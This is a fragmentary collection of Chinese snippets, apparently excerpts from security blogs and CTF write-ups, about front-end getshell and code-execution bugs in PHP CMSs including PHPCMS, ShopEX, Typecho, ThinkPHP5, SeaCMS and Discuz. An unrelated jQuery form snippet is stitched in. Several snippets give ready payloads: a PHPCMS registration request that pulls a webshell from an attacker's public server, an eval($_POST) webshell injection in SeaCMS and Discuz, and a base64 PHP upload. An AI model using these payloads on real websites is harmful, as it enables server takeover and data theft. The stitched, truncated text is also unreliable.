漏洞地址:http://www.sch01ar.com/index.php/api/Uploadify/preview 这样子说明存在漏洞 对 <?php phpinfo(); 进行 base64 编码 构造: data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA= 通过 post 方式发生数据 返回了结果地址,访问一下 成功

PHPCMS9.6.0最新版中,由于/modules/attachment/attachments.php的过滤函数的缺陷导致了可以绕过它的过滤机制形成SQL注入漏洞,可导致数据库中数据泄漏. 而且在前台上传文件处,没有对文件后缀进行严格的审查,导致可以前台GETSHELL,直接获取到了网站的权限.点击马上实验,i春秋安全专家带你体验漏洞成因及危害. https://www.ichunqiu.com/course/58003  课程详解 DEF CON 24·400米之外破解你的智能蓝牙锁(公开

ShopEX 4.8.5.81822 前台Getshell 作者:unhonker   发布:2014-06-23 00:12   分类:漏洞公布   被撸:8,179次   抢沙发     利用方式:Post提交 Post Data conf_key=<!--?php phpinfo();?-->.yyyyy&conf_val=test 至 http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&a

PHP7CMS 无条件前台GETSHELL Version:2018-10-09 //最新版中以修复此漏洞 这个漏洞很简单,如果作者在写代码的时候考虑到一点点安全方面,其实都可以避免的.   01 02 03 04 05 06 07 08 09 10 11 12 // php7cms/Core/Controllers/Api/Api.php // 52~61 line public function save_form_data() {       $rt = \Phpcmf\Service::

Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了命令执行. 影响范围:理论上这个漏洞影响Typecho 1.1(15.5.12)之前的版本 首先我还是记录一下敏感目录 http://127.0.0.1/typecho0.9/install.php http://127.0.0.1/typecho0.9/install.php?finish&use

0×00 背景 网站为了实现加速访问,会将用户访问过的页面存入缓存来减小数据库查询的开销.而Thinkphp5框架的缓存漏洞使得在缓存中注入代码成为可能.(漏洞详情见参考资料) 本文将会详细讲解: 1. 如何判断缓存漏洞存在的可能性 2. 如何利用Thinkphp5的框架漏洞结合网站的一些配置实现前台getshell 希望可以给予读者一些关于漏洞应用的启发. 0×01 环境 测试环境 1.某基于Thinkphp5.0.10搭建的论坛类测试网站 2.apache2 3.php5.6及以上版本,相关

phpcms v9 前台getshell脚本 用法:python phpcmsv9getshell.py http://baidu.com # -*- coding:utf-8 -*- ''' ---------------------- Author : Akkuman Blog : hacktech.cn ---------------------- ''' import requests import sys from datetime import datetime def getTim

弄了3天了  这个点 总结一下这三天的坑吧 0X01 注入点入手 /index.php?m=wap&c=index&a=init&siteid=1 获取cookie 传给 userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4 然后 构造SQL语句 /index.php?m=attachment&c=attachments&a=swfupload_json&aid=&src=%26id=%*+and

首先准备一台公网服务器,在上面新建一个一句话的txt文件.如下: 接着打开目标网站,点击注册,填写信息后点击提交,拦截该数据包. 将其中post提交的数据替换成我们的poc,poc如下: siteid=1&modelid=11&username=ab1cd&password=1123456&email=1abcd@qq.com&info[content]=src=http://60.xxx.xxx.102/1.txt?.php#.jpg&dosubmit=1

12年爆出的一个洞 前几天比赛的一个cms  于是跟出题人表哥要过来审计了看看 漏洞文件再根目录thumb.php中 <?php /* * 自动缩略图 参数 url|w|h|type="cut/full"|mark="text/image|r" * thumb.php?url=/thinksns/data/userface/000/00/00/41_middle_face.jpg?1247718988&w=20&h=20 */ error_re

0x00 前言 这套系统搞了有点久了,漏洞是发现了,但一直卡在某个地方迟迟没拿下来. 下面就分享一下自己审这套系统的整个过程. 0x01 系统简介 略   0x02 审计入口 看到inc\function\global.php 文件 这套系统用了360的防护代码 对get,post,cookie都进行了过滤,但有一点挺有趣的. 在p=admin的时候,post数据是不会过滤的,目测后台是有sql执行这样的功能.(后台还没看) 在下面发现,对get,post数据进行了全局变量注册.可以考虑有没有全

1.环境: php5.5.38+apache+seacms v6.54 上一篇文章针对seacms v6.45 进行了分析,官方给出针对修复前台geishell提供的方法为增加: $order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : ""; 并且在v6.54中增加了对传入变量的长度限制,限制为20个字符之内,因此单一针对

来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137991.html 先通过uc_key把恶意代码保存在/uc_client/data/cache/badwords.php,然后利用preg_replace() 进行任意代码执行. 先附上来源中的脚本.修改了一些代码. <?php $timestamp = time()+10*3600; $host="ip地址"; $agent= md5("Mozilla/5.

  0x00 环境准备 LaySNS官网:http://www.laysns.com/ 网站源码版本:LaySNS_v2.2.0 程序源码下载:https://pan.lanzou.com/i0l38li 默认后台地址:http://127.0.0.1/admin.php/login/index.html 默认账号密码:admin/admin 测试网站首页: 0x01 代码分析 1.        漏洞文件位置:/application/index/controller/Index.php 第5

一.利用jquery.form插件提交表单方法使用jquery.validate插件 现象:当提交表单时,即使前台未验证通过,也照常提交表单. 解决办法: $('#myForm').submit(function(){ if (!$(this).valid()) return false;//加上此句OK $('.error').html(''); $("#go").prop("disabled",true); $(this).ajaxSubmit({ type:&

思路来自于 http://www.cnbraid.com/2016/09/18/phpcms/ 这里自己复现了一下,自己写了一下 因为是后台的,还得登陆两次..所以不好用,主要是学习学习 漏洞来自于ROOTDIR/phpsso_server/phpcms/modules/admin/system.php public function uc() { if (isset($_POST['dosubmit'])) { $data = isset($_POST['data']) ? $_POST['d

一.漏洞分析 漏洞触发点search.php 211-213行 跟进parseIf 函数 ./include/main.class.php 这里要注意 3118行的位置,可以看到未做任何处理的eval 二.触发条件 if(intval($searchtype)==5) if (strpos($content,'{if:')=== true) {if:(.*?)}(.*?){end if} if (strpos($strThen,$labelRule2)===false) if (strpos($

环境搭建 源码下载:https://github.com/typecho/typecho/archive/v1.1-15.5.12-beta.zip 下载后部署到web根目录,然后进行安装即可,其中注意要提前在mysql中创建一个对应的数据库. 漏洞分析 漏洞起始点前的障碍清除 先是一个refer检测,填写一个站内地址即可 $_SERVER中到底哪些是可以通过客户端进行控制的呢??? 漏洞起始点 . 全局搜索所有的__wakeup函数和__destruct函数,但似乎都没有利用点 按照之前的思路

EXP: 执行phpinfo()语句: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo(); 利用POST传值带入执行语句: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3B; 利用条件: 1

题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞: 海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1]) 之后用菜刀连接,但乍一看并没有flag.php 反手去查了一下海洋cms的数据库配置文件的存放地址: 出去用菜刀连接数据库 编辑完成后右键数据库管理,可以看到flag了